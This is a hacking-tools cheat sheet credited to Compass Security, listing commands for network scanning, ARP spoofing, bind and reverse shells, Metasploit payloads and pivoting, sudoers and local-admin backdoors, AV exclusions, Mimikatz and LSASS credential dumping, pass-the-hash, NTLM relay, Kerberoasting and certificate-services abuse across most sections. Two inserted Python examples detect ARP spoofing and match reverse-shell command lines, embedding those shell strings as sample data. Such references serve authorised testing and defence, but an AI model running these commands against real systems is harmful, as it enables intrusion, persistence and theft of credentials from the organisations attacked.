Hacking Tools Cheat Sheet 2023

This document is a cheat sheet of hacking tools covering basic Linux networking commands, information gathering techniques, network scanning, sniffing, IP and TCP tools, TLS, shells, and performance tuning for nmap scans. It lists commands and filters for tasks such as viewing IP configuration, changing the MAC address, DNS lookups, port scanning, ARP spoofing, TLS servers, bind shells and reverse shells.
Hacking Tools Cheat Sheet
v2.0, September 2023, Compass Security

Basic Linux Networking

Show IP configuration:
$ ip addr show

Change MAC address:
# ip link set dev eth0 down
# macchanger -m [Link] eth0
# ip link set dev eth0 up

Static IP address configuration:
# ip addr add [Link]/24 dev eth0
# ip route add default via [Link]

DNS and reverse DNS lookup:
$ dig [Link]
$ dig -x [Link]

Information Gathering

Find owner of domain or IP address:
$ whois [Link]

Get nameservers and try DNS zone transfer:
$ dig [Link] ns
$ dig [Link] axfr @[Link]

Use multiple sources for hostname discovery:
$ subfinder -d [Link] -all

Sources for hostname / subdomain discovery:
▪ [Link], [Link], [Link]

Network Scanning

Useful nmap options:
▪ -n: Disable name and port resolution
▪ -PR: ARP host discovery
▪ -Pn: Disable host discovery
▪ -sn: Disable port scan (host discovery only)
▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan
▪ --top-ports 50: Scan 50 top ports
▪ -iL file: Host input file
▪ -oA file: Write output files (3 file formats)
▪ -sC: Script scan (default scripts)
▪ --script <file/category>: Specific scripts
▪ -sV: Version detection
▪ -6: IPv6 scan
▪ --open: Do not wait for RST (improves speed)
▪ -v/-d: Verbose / debugging output

Specify target via CIDR 10.5.23.0/24, ranges 10.13-37.5.1-23 or input file -iL [Link].

Reverse DNS lookup of IP address range:
# nmap -sL [Link]/24

ARP host discovery:
# nmap -n -sn -PR [Link]/24

Host discovery (ARP, ICMP, SYN 443, ACK 80):
# nmap -sn -n [Link]/24

SYN scan (half-open scan = SYN/SYN-ACK/RST):
# nmap -Pn -n -sS -p 22,80 [Link]

List nmap scripts:
$ ls /usr/share/nmap/scripts

Scan for EternalBlue vulnerable hosts:
# nmap -n -Pn -p 443 --script smb-vuln-ms17-010 [Link]/24

Scan for vulnerabilities (script category filter):
# nmap -n -Pn --script "vuln and safe" [Link]/24

Run script on non-default port using +:
# nmap -n -Pn -p 80 --script +http-title [Link]

Performance Tuning (1 SYN packet ≈ 60 bytes → 20'000 packets/s ≈ 10 Mbps):
# nmap -n -Pn --min-rate 20000 [Link]/24

Public internet scan databases:
▪ [Link], [Link]

Sniffing

ARP spoofing:
# arpspoof -t [Link] [Link]

GUI version:
# ettercap -G

Show / delete ARP cache:
$ ip neigh show
# ip neigh flush all

Sniff traffic:
# tcpdump [options] [filters]

Useful tcpdump options:
▪ -i interface: Interface or any for all
▪ -n: Disable name and port resolution
▪ -A: Print in ASCII
▪ -XX: Print in hex and ASCII
▪ -w file: Write output PCAP file
▪ -r file: Read PCAP file

Useful tcpdump filters:
▪ not arp: No ARP packets
▪ port ftp or port 23: Only port 21 or 23
▪ host [Link]: Only from/to host
▪ net [Link]/24: Only from/to networks
Use tshark or Wireshark for advanced sniffing.

Sniffing over SSH on a remote host:
$ ssh [Link] sudo tcpdump -w- port not ssh | wireshark -k -i -

Search in traffic, show HTTP traffic or images:
# ngrep -i pass; urlsnarf; driftnet

IP

Test IP forwarding for a specific MAC address:
# nping -e eth0 --tcp -p 443 --dest-mac [Link] [Link]

TCP

Listen on TCP port:
$ ncat -vnlp 2305

Connect to TCP port:
$ ncat -v [Link] 2305

TLS

Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048 -keyout [Link] -out [Link] -nodes -subj "/CN=[Link]/"

Start TLS Server:
$ openssl s_server -cert [Link] -key [Link] -port 2305
$ ncat --ssl -l -p 2305 --ssl-cert [Link] --ssl-key [Link]

Connect to TLS service:
$ openssl s_client -connect [Link]:2305
$ ncat --ssl [Link] 2305

Show certificate details of full chain:
$ openssl s_client -showcerts -connect [Link]:2305 | openssl x509 -text

Test TLS server certificate and protocols/ciphers:
$ sslyze [Link]

TCP to TLS proxy:
$ socat TCP-LISTEN:2305,fork,reuseaddr ssl:[Link]

Online TLS tests: [Link], [Link]

HTTP

Start Python webserver on port 2305:
$ python3 -m [Link] 2305

Start webserver for data up/download:
$ goshs -s -ss -p 2305 -b user:hunter2

Perform HTTP request:
$ curl [Link]

Useful curl options:
▪ -k: Accept untrusted certificates
▪ -d "foo=bar": HTTP POST data
▪ -H "Foo: Bar": HTTP header
▪ -I: Perform HEAD request
▪ -L: Follow redirects
▪ -o [Link]: Write output file
▪ --proxy [Link]: Set proxy

Scan for common files/applications/configs:
# nikto -host [Link]

Enumerate common directory-/filenames:
$ feroxbuster -u [Link] -w [Link]

Get wordlists (raft*, wellknown*, quickhits):
▪ GitHub danielmiessler/SecLists
▪ GitHub fuzzdb-project/fuzzdb

Shells

Start bind shell (on victim):
$ ncat -vnlp 2305 -e "/bin/bash -i"

Connect to bind shell (on attacker):
$ ncat -v [Link] 2305

Listen for reverse shell (on attacker):
$ ncat -vnlp 2305

Start reverse shell (on victim):
$ ncat -e "/bin/bash -i" [Link] 2305
$ bash -i &>/dev/tcp/[Link]/42 0>&1
More shells on [Link].

Upgrade to more functional pseudo terminal:
victim $ python -c 'import pty; [Link]("/bin/bash")'
victim $ ^Z # press Ctrl-Z
attacker $ stty -a # get ROWS/COLS
attacker $ stty raw -echo
attacker $ fg # press enter twice
victim $ stty rows <ROWS> cols <COLS>
victim $ export TERM=xterm-256color

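The Sniffing section lists arpspoof and "ip neigh show" side by side; the defensive counterpart is to read the neighbour table and look for the trace an ARP spoof leaves on a victim: one MAC address answering for several IPv4 addresses (its own and the impersonated gateway's), or the gateway's MAC differing from a recorded baseline. The script below is an added example, not code from the Compass Security cheat sheet; the neighbour-table lines, the 10.5.23.x addresses and the MACs are constructed, and the "ip neigh show" output format assumed is the iproute2 one (ip dev iface lladdr mac STATE).

```python
"""Flag ARP-cache entries that look like ARP spoofing (added example, not from the cheat sheet)."""
import re
import subprocess
from collections import defaultdict

# Constructed sample in `ip neigh show` format: 10.5.23.1 is the gateway and
# 10.5.23.42 is a host whose MAC is now also bound to the gateway address.
SAMPLE_NEIGH = """\
10.5.23.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
10.5.23.42 dev eth0 lladdr 00:11:22:33:44:55 STALE
10.5.23.7 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
10.5.23.9 dev eth0 FAILED
fe80::1 dev eth0 lladdr 00:11:22:33:44:55 router REACHABLE
"""

# ip, interface, optional lladdr, then any flags (e.g. "router") and the NUD state.
NEIGH_RE = re.compile(
    r"^(?P<ip>\S+) dev (?P<dev>\S+)(?: lladdr (?P<mac>[0-9a-f:]{17}))?.*?(?P<state>[A-Z]+)$"
)


def parse_neigh(text):
    """Return a list of (ip, dev, mac, state); entries without lladdr get mac=None."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            entries.append((m["ip"], m["dev"], m["mac"], m["state"]))
    return entries


def find_duplicate_macs(entries, ipv4_only=True):
    """Map (dev, mac) -> sorted IPs for every MAC that claims more than one IP.

    IPv6 is skipped by default: a NIC legitimately has link-local and global
    addresses on the same MAC, which would otherwise look like a duplicate.
    """
    claims = defaultdict(set)
    for ip, dev, mac, _state in entries:
        if mac is None or (ipv4_only and ":" in ip):
            continue
        claims[(dev, mac)].add(ip)
    return {k: sorted(v) for k, v in claims.items() if len(v) > 1}


def gateway_mac_changed(entries, gateway_ip, expected_mac):
    """True if the gateway's cached MAC differs from the baseline MAC recorded earlier."""
    for ip, _dev, mac, _state in entries:
        if ip == gateway_ip:
            return mac is not None and mac.lower() != expected_mac.lower()
    return False  # gateway not in the cache: nothing to compare against


def live_neigh():
    """Read the real neighbour table (Linux with iproute2)."""
    return subprocess.run(["ip", "neigh", "show"], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    entries = parse_neigh(SAMPLE_NEIGH)  # swap in live_neigh() on a real host
    for (dev, mac), ips in find_duplicate_macs(entries).items():
        print(f"[!] {mac} on {dev} answers for {len(ips)} IPs: {', '.join(ips)}")
    if gateway_mac_changed(entries, "10.5.23.1", "00:11:22:33:44:55"):
        print("[!] gateway MAC differs from baseline")
```

Run it periodically (or from a cron job) against live_neigh() with the gateway MAC captured on a known-clean network; a STALE or REACHABLE entry that suddenly shares the gateway's MAC with another host is the same condition "ip neigh flush all" is used to clear.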
Hacking Tools Cheat Sheet, v2.0, August 2023, Compass Security, [Link] 1
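The Shells section above lists the bind shell, reverse shell and PTY-upgrade one-liners a tester uses; on the defensive side the same strings are what a process-creation rule has to catch. The following is an added example, not part of the Compass Security cheat sheet: each rule is a regex over a process command line built from the exact forms shown on the sheet (ncat -e, bash with a /dev/tcp redirection, python pty.spawn), and the exec records it is run against are constructed, with the 10.5.23.x addresses being placeholders.

```python
"""Match process command lines against the shell one-liners from the Shells section (added example)."""
import re

# (rule name, pattern over the full command line). Patterns mirror the sheet's commands only.
RULES = [
    ("ncat_exec_shell", re.compile(r"\bn?cat\b.*\s-e\s+[\"']?/bin/(ba)?sh")),   # ncat -e "/bin/bash -i" (bind or reverse)
    ("bash_dev_tcp", re.compile(r"\bbash\b.*[&>]\s*/dev/tcp/[\w.:-]+/\d+")),   # bash -i &>/dev/tcp/host/port
    ("python_pty_spawn", re.compile(r"\bpython\d?\b.*pty\.spawn\(")),           # python -c 'import pty; pty.spawn(...)'
]

# Constructed execve-style records: (pid, user, command line).
SAMPLE_EXECS = [
    ("1001", "alice", "/usr/bin/python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"),
    ("1002", "www-data", "bash -i &>/dev/tcp/10.5.23.7/42 0>&1"),
    ("1003", "www-data", "ncat -e \"/bin/bash -i\" 10.5.23.7 2305"),
    ("1004", "alice", "ncat -v 10.5.23.42 2305"),           # plain client connect: benign
    ("1005", "root", "/usr/bin/cat /etc/hosts"),             # 'cat' must not trip the ncat rule
    ("1006", "backup", "ncat -vnlp 2305 -e /bin/sh"),        # bind shell form
]


def classify(cmdline):
    """Return the names of every rule the command line triggers (empty list if none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(execs):
    """Return (pid, user, hits) for each record that triggers at least one rule."""
    results = []
    for pid, user, cmd in execs:
        hits = classify(cmd)
        if hits:
            results.append((pid, user, hits))
    return results


if __name__ == "__main__":
    for pid, user, hits in scan(SAMPLE_EXECS):
        print(f"pid={pid} user={user} rules={','.join(hits)}")
```

The point of the word boundaries and the explicit "-e /bin/..." requirement is precision: "/usr/bin/cat" and an ordinary "ncat -v host port" must stay quiet, otherwise the rule is tuned out within a day. The same patterns translate directly into auditd or EDR command-line filters.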
Vulnerability DBs and Exploits

Exploit search (local copy of the Exploit-DB):
$ searchsploit apache

Show exploit file path and copy it into clipboard:
$ searchsploit -p 40142

Online vulnerability and exploit databases:
▪ [Link], [Link], [Link]

Cracking

Online brute force SSH passwords:
# ncrack -p 22 --user root -P [Link] [Link]/24

Determine hash type:
# hashid 869d[...]bd88

Show example hash types for hashcat:
$ hashcat --example-hashes

Crack hashes (e.g. type 1000 for NTLM):
$ hashcat -m 1000 -a 0 [Link] -r [Link] /opt/wordlists/*

Crack hashes using John the Ripper:
$ john --wordlist=[Link] [Link]

Metasploit Framework

Start Metasploit, search & use exploit:
# msfconsole
msf > search eternalblue
msf > use exploit/windows/smb/ms17_…
msf exploit(…) > show options
msf exploit(…) > set TARGET [Link]
msf exploit(…) > exploit

Generate reverse shell (WAR):
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip address> LPORT=443 -f war > [Link]

Reverse shell listener:
msf > use exploit/multi/handler
msf > set payload linux/x64/shell_reverse_tcp
msf > set LHOST [Link] # attacker
msf > set LPORT 443
msf > exploit

Upgrade to Meterpreter:
background # or press Ctrl-Z ^Z
background session 1? [y/N] y
msf > sessions # list sessions
msf > sessions -u 1 # upgrade
msf > sessions 2 # interact
meterpreter > sysinfo # use it

File exchange / execute binary:
meterpreter > upload [Link]
meterpreter > download c:\[Link]
meterpreter > execute -i -f /your/bin

Port forwarding to localhost:
meterpreter > portfwd add -l 2323 -p 3389 -r [Link]

Background Meterpreter session:
meterpreter > background

Pivoting through existing Meterpreter session:
msf > use post/multi/manage/autoroute
msf > set session 2 # meterpreter sess
msf > run
msf > route

SOCKS via Meterpreter (requires autoroute):
msf > use auxiliary/server/socks4a
msf > set SRVPORT 8080
msf > run

Configure ProxyChains:
# vi /etc/[Link]
[...]
socks4 [Link] 1080

Connect through SOCKS proxy:
# proxychains ncat [Link] 2305

Linux Privilege Escalation

Check for common privesc techniques:
▪ GitHub carlospolop/PEASS-ng → linPEAS
▪ GitHub rebootuser/LinEnum
▪ GTFOBins: [Link]

Set SUID bit to shell and start root shell:
# chmod +s $(which sh)
$ sh -p

Add SUDO backdoor user:
# echo "user ALL=(ALL:ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README

Lateral Movement Linux

Sniff SSH passwords:
# strace -p "$(pgrep -f /usr/sbin/sshd)" -f -e trace=write

SSH agent hijacking:
# export SSH_AUTH_SOCK=/tmp/ssh…/agent
# ssh-add -l

Windows Privilege Escalation

Bypass PowerShell execution policy:
PS > Set-ExecutionPolicy -Policy bypass -Scope process

Check for common privesc techniques:
▪ GitHub carlospolop/PEASS-ng → winPEAS
▪ GitHub itm4n/PrivescCheck
▪ GitHub PowerShellMafia/PowerSploit → PowerUp.ps1

Exploit WSUS updates delivered via HTTP:
$ pywsus --host [Link] --port 8530 --executable /opt/[Link] --command '/accepteula /s [Link] /c "[Link] -encodedCommand J[…]"'

Add new local admin to persist after privesc:
C:\> net user backdoor hunter2
C:\> net localgroup Administrators backdoor /add

Add AV exclusion:
PS > Add-MpPreference -ExclusionPath C:\tmp\

Active Directory

Start process with network credentials:
C:\> runas /netonly /user:[Link]\alice [Link]

Analyze AD & create report using PingCastle:
C:\> [Link] --healthcheck --explore-trust --explore-forest-trust --no-enum-limit

Gather BloodHound data using SharpHound:
C:\> [Link] -c All,GPOLocalGroup

Query AD using PowerView:
PS > Import-Module PowerView.ps1
PS > Get-Domain
PS > Get-DomainUser
PS > Get-DomainTrust
PS > Get-DomainComputer
PS > Get-DomainController
PS > Get-DomainGroupMember -Recurse -Identity "Domain Admins"

Network Shares

Search for juicy files on domain joined systems:
C:\> [Link] -s -o [Link]

Scan for network shares:
$ [Link] --host-file [Link] -u Administrator -p PasswordOrHash

Windows Credentials Gathering

Use AMSI bypasses from [Link].

Start Mimikatz and create log file:
C:\> [Link]
mimikatz # log C:\tmp\[Link]
mimikatz # privilege::debug

Show passwords/hashes of logged in users:
mimikatz # sekurlsa::logonpasswords

Dump [Link] using taskmgr or:
PS > (Get-Process -Name lsass).Id
PS > [Link] -accepteula -ma <pid> c:\[Link]
PS > [Link] C:\windows\System32\[Link] MiniDump <pid> C:\[Link] full

Read LSASS process dump:
mimikatz # sekurlsa::minidump [Link]
$ pypykatz lsa minidump [Link]

Dump LSASS remotely:
$ lsassy -u admin -H e8[…]97 hostname

Export SYSTEM & SAM hive for local users:
C:\> reg save HKLM\SYSTEM [Link]
C:\> reg save HKLM\SAM [Link]

Dump hashes from SYSTEM & SAM file:
mimikatz # lsadump::sam /system:[Link] /sam:[Link]
$ [Link] -sam [Link] -system [Link] local

Dump local user hashes remotely:
$ [Link] [Link]/alice:hunter2@hostname
$ crackmapexec -u admin --local-auth -H :01[…]D03 [Link]/24 --sam

DCSync:
$ [Link] -just-dc -just-dc-user alice [Link]/admin:s3cret@dc
mimikatz # lsadump::dcsync /user:alice

Pass-the-Hash

Remote shell:
$ [Link] -hashes :23[…]05 domain/username@[Link]
Alternatives: [Link], [Link].
Access shares:
$ [Link] -hashes :23[…]05 [Link]/alice@[Link]

Spray hash over a subnet:
$ crackmapexec smb [Link]/24 -u alice -d [Link] -H 23[…]05

Enable restricted admin mode:
PS > New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name DisableRestrictedAdmin -Value 0 -PropertyType DWORD -Force

RDP (requires restricted admin mode):
$ xfreerdp /u:alice /d:[Link] /pth:23[…]05 /v:[Link]

RDP using mimikatz:
mimikatz # sekurlsa::pth /user:alice /domain:[Link] /ntlm:23[…]05 /run:"[Link] /restrictedadmin"

NTLM Relay

Vulnerable if message signing disabled:
# nmap -n -Pn -p 445 --script smb-security-mode [Link]/24

Generate relay list:
$ crackmapexec smb [Link]/24 --gen-relay-list [Link]

Disable SMB and HTTP in [Link] and start Responder for LLMNR/NBT-NS poisoning:
# responder -I eth0

NTLM Relay to target and extract SAM file:
# [Link] -smb2support -t smb://[Link]

NTLM Relay using socks proxy:
# [Link] -tf [Link] -smb2support -socks

Configure ProxyChains & access files via proxy:
$ proxychains [Link] [Link]/alice:InvalidPw@[Link]

Coercion / Connection Triggering

Coerce via shortcut file ([Link]):
[InternetShortcut]
URL=[Link]
IconIndex=0
IconFile=\\[Link]\[Link]

Coerce via PrinterBug (Print Spooler Service):
$ [Link] [Link]/alice:pwd@victim attacker [Link]
mimikatz # misc::spooler /connect:victim /server:attacker

Coerce via PetitPotam (EFS remote protocol):
$ [Link] -u alice -p hunter2 -d [Link] attacker victim
mimikatz # misc::efs /connect:victim /server:attacker

Coerce using multiple different techniques:
$ [Link] coerce -u alice -p hunter2 --target victim --listener-ip attacker

Password Spraying

Display password policy:
C:\> net accounts /domain

Password spraying for all domain users:
C:\> [Link] brute /password:s3cret

Password spraying for certain users:
C:\> [Link] brute /users:[Link] /passwords:[Link]
$ kerbrute passwordspray --dc [Link] -d [Link] [Link] hunter2

Kerberos

List Kerberos tickets:
C:\> klist
C:\> [Link] klist

Dump Kerberos keys:
mimikatz # sekurlsa::ekeys

Get TGT for current user:
C:\> [Link] tgtdeleg

Get TGT for specific user:
C:\> [Link] asktgt /user:alice /domain:[Link] /password:pwd /ptt
Pass-the-key using /rc4, /aes128 or /aes256.

Pass-the-Ticket:
C:\> [Link] ptt /ticket:doI[…]=

Dump tickets (luid from rubeus klist):
C:\> [Link] dump /luid:0x234205 /nowrap

Import ticket:
C:\> [Link] ptt /ticket:doI[…]=

Get ST:
C:\> [Link] asktgs /ticket:doI[…]= /service:cifs/[Link] /ptt

S4U2Self (machine account to local admin):
C:\> [Link] asktgt /nowrap /domain:[Link] /user:"MYHOST$" /aes256:23[...]05
C:\> [Link] s4u /self /nowrap /impersonateuser:domainadmin /altservice:cifs/[Link] /ticket:doI[…]=

Kerberoasting

Get users with SPN:
PS > Get-DomainUser -SPN

Kerberoast (hashcat mode 13100):
C:\> [Link] kerberoast /outfile:[Link]

Get users which do not require preauth:
PS > Get-DomainUser -UACFilter DONT_REQ_PREAUTH

AS-REP roast (hashcat mode 18200):
C:\> [Link] asreproast /format:hashcat /outfile:[Link]

Kerberos Delegation

Get unconstrained delegation systems:
PS > Get-DomainComputer -Unconstrained

Watch for forwardable tickets:
C:\> [Link] monitor /interval:10
C:\> [Link] triage /nowrap
Coerce DC, import ticket & DCSync to privesc.

Get constrained delegation systems:
PS > Get-DomainUser -TrustedToAuth
PS > Get-DomainComputer -TrustedToAuth

Get ST using constrained delegation account:
C:\> [Link] s4u /domain:[Link] /user:sql_user /rc4:23[…]05 /impersonateuser:alice /msdsspn:cifs/[Link] /altservice:host /ptt /nowrap

DACL / Shadow Credentials

Use GenericAll/GenericWrite to add certificate:
C:\> [Link] add /target:alice

Get NTLM hash via PKINIT/U2U:
C:\> [Link] asktgt /user:alice /certificate:MI[…]= /password:hunter2 /domain:[Link] /dc:[Link] /getcredentials /show

Remove certificate to cleanup:
C:\> [Link] clean /target:alice

Active Directory Certificate Services

List CAs & find vulnerable templates:
C:\> [Link] cas
C:\> [Link] find /vulnerable

Request certificate with specified subject:
C:\> [Link] request /ca:[Link]\CA /template:ESC1 /altname:bob /install

Use certificate to get Kerberos ticket:
C:\> [Link] asktgt /ptt /user:bob /certificate:[Link] /password:hunter2 /domain:[Link] /dc:[Link]

NTLM relay to HTTP enrollment endpoint:
$ [Link] -t [Link] -smb2support --adcs --template Machine

MS SQL

Use PowerUpSQL & get instances:
PS > Import-Module PowerUpSQL.ps1
PS > $t = Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" }; $t

Get information & vulnerabilities:
PS > $t | Get-SQLServerInfo
PS > $t | Invoke-SQLAudit -v

Coerce (alternatively xp_fileexist):
PS > Get-SQLQuery -Verbose -Query "EXEC [Link].xp_dirtree '\\[Link]\x,1, 1" -Instance "[Link],1433"

Command execution (requires sysadmin):
PS > Invoke-SQLOSCmd -Command "whoami" -Rawresults -Instance "mssql…,1433"

Useful Online Resources

▪ Compass Link Collection: [Link]/secres
▪ The Hacker Recipes: [Link]
▪ The Hacker Tools: [Link]
▪ Hacktricks: [Link]
▪ Red Team Notes: [Link]
▪ Get the latest cheat sheet version at GitHub: CompassSecurity/Hacking_Tools_Cheat_Sheet